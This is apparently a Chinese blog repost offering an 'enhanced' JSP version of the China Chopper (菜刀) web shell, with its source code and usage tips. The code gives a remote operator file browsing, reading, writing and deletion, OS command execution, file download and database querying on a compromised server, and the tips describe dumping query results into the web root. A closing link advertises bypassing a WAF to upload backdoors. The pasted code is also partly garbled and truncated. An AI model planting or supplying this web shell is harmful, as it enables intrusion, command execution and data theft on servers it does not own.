菜刀Jsp脚本增强版

某些朋友需求，这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化，新增了查询自定义备份功能。

修复BUG：

1、初始化获取容器绝对路径错误如：原本路径是D:wooyun菜刀连接默认跳转到了：D:wooyunwooyun目录。

2、修改了无法连接Oracle数据库问题

3、修改了远程下载代码

4、重新压了下代码

新的客户端代码如下：

2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+""+"|");String s = request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs, z1, z2,sb,s.replaceAll("\","/")+"/images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"

执行自定义查询备份：

在任意的SQL语句后面加上：--f:xxxx.sql(任意文件名和后缀)

如：

SELECT * FROM DEPT ORDER BY 1 DESC --f:2.sql

程序会自动在网站根目录新建或打开images文件夹写入2.sql.

直接访问菜刀URL地址报错问题：

这是由于菜刀默认必须传入编码，如果编码为空那么会爆一个异常导致500错误页面。如果你硬是要看到不报错的页面你可以这样去访问：

http://127.0.0.1/wooyun/2.jsp?z0=utf-8

菜刀连接各种数据库问题：

菜刀其实是可以连接任意数据库的，但是有个前提，在当前应用或容器下必须有对应的数据库的jar包，否则无法连接。jar包位置在/WEB-INF/lib目录，没有对应的jar则无法连接。

连接任意数据库的URL大致格式（抄袭下面的格式无效，自行小修改即可）

//ORACLE
private static final String ORACLEDRIVER = "oracle.jdbc.driver.OracleDriver";
private static final String ORACLEURL = "jdbc:oracle:thin:@[host]:[port]:[dbname]";

//MSSQL2000
private static final String MSSQL2000DRIVER = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
private static final String MSSQL2000URL = "jdbc:microsoft:sqlserver://[host]:[port];databasename=[dbname]";

//MSSQL2005
private static final String MSSQL2005DRIVER = "com.microsoft.sqlserver.jdbc.SQLServerDriver";
private static final String MSSQL2005URL = "jdbc:sqlserver://[host]:[port];databaseName=[dbname]";

//MYSQL
private static final String MYSQLDRIVER = "com.mysql.jdbc.Driver";
private static final String MYSQLURL = "jdbc:mysql://[host]:[port]/[dbname]";

//Db2
private static final String IBMDB2DRIVER = "com.ibm.db2.jcc.DB2Driver";
private static final String IBMDB2URL = "jdbc:db2://[host]:[port]/[dbname]";

//Informix
private static final String INFORMIXDRIVER = "com.informix.jdbc.IfxDriver";
private static final String INFORMIXURL = "jdbc:informix-sqli://[host]:[port]/[dbname]";

//Sybase2
private static final String SYBASE2DRIVER = "com.sybase.jdbc2.jdbc.SybDriver";
private static final String SYBASE2URL = "jdbc:sybase:Tds:[host]:[port]?ServiceName=[dbname]";

//Sybase3
private static final String SYBASE3DRIVER = "com.sybase.jdbc3.jdbc.SybDriver";
private static final String SYBASE3URL = "jdbc:sybase:Tds:[host]:[port]?ServiceName=[dbname]";

//PostgreSQL
private static final String POSTGRESQLDRIVER = "org.postgresql.Driver";
private static final String POSTGRESQLURL = "jdbc:postgresql://[host]:[port]/[dbname]";

//Teradata
private static final String TERADARADRIVER = "com.ncr.teradata.TeraDriver";
private static final String TERADARAURL = "jdbc:teradata://[host]:[port]/[dbname]";

//Netezza
private static final String NETEZZADRIVER = "org.netezza.Driver";
private static final String NETEZZADURL = " jdbc:netezza://[host]:[port]/[dbname]";

[原文地址]

文章来源于lcx.cc:菜刀Jsp脚本增强版

相关推荐: Windows下使用特殊文件名绕过安全狗上传脚本后门[3.3 08722]

绕过安全狗上传[3.3 08722] 90_ | 2014-06-27 13:42 ########################################## # Title ：绕过安全狗上传[3.3 08722] # Team ：08 Securi…